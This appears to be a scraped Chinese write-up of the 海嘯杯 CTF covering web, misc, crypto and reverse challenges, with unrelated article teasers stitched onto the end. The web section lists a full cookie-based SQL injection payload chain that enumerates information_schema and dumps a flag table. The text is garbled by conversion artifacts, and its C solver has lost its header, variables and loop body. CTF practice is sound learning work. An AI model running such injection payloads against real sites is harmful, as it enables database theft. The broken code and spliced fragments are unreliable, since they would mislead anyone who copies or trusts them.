海嘯杯web
海嘯杯misc
海嘯杯cryptography
開啟string window即可檢視
按f5檢視**
開啟看到有這麼一串字元
再次點開puts裡面的引數
說明!strcmp(v1, v0)的值要為1,然後strcmp函式為0的時候,裡面的v1=v0
已知v0的值是:kanlxvdztljytfyteuor ,現在就求v1的值(即a1)
其中0xc表示十六進製制,十進位制是12,異或符的運算如下圖,12異或12等於0,0異或乙個數還是本身,所以就可以把等式左邊的^12消去。然後寫乙個c指令碼就可以得到flag
#include
"stdio.h"
void
main()
for(i=
0;i<
20;i++
)}
開啟網頁看到
應該是要偽造ip和未受權訪問,輸入
即可得到flag
首先抓包,發現cookie的引數base64編碼點奇怪
url解碼然後base64解碼後發現是1,很明顯的cookie注入。
①1'order by 2 --
查出欄位為2
②-1'union select 1,2 --
查出顯位為2
③-1'union select 1,database()--
查出資料庫庫名為ctf
④-1'union select 1,(select table_name from information_schema.tables where table_schema='ctf' limit 0,1) --
查出表名為flag
⑤-1'union select 1,(select column_name from information_schema.columns where table_schema='ctf' and table_name='flag' limit 0,1) --
查出欄位名分別為id和flag
⑥-1'union select 1,(select flag from ctf.flag limit 0,1) --
查出資料flag
注意語句後面不要寫成--+
而是--
,因為+是url的編碼,+原本就是空格。
base64解碼
import base64
f =open
(r'flag.txt'
,'r'
)s = f.read(
)f2 =
open
(r'flag.png'
,'w'
)flag =
str(base64.b64decode(s)
)f2.write(flag)
f2.close(
)f.close(
)
執行一下這個python指令碼即可得到flag
用binwalk分離一下即可得到隱藏的檔案
)}往前偏移3位,再base64解碼即可得到flag
柵欄密碼,找個**直接解開
攻防世界Reverse題目writeup
小白最近做了一些reverse題目,整理整理 import base64 defencode message s for i in message x ord i 32 x x 16 s chr x return base64.b64encode s correct xlnkvmtui1mgxwbz...
攻防世界WEB部分write up
新手入門區域 1.command execution 小寧寫了個ping功能,但沒有寫waf,x老師告訴她這是非常危險的,你知道為什麼嗎。wp 輸入127.0.0.1 ls,發現可執行後面的ls,故直接用find命令查詢 127.0.0.1 find name flag 看到 home flag.t...
BXS入門賽部分writeup
前言 沒有聽魚哥的話,事先沒有裝好環境,於是開始沒做出來,然後全程在裝pwntools,經過一番努力,失敗了0.0 最終在網上搜了一段python socket連線指令碼,終於可以做題了 哭 這是乙個盲打,向服務端傳送一定長度的字串,服務端就會給你最喜歡的flag.寫下指令碼嘗試需要多長的字元才可以...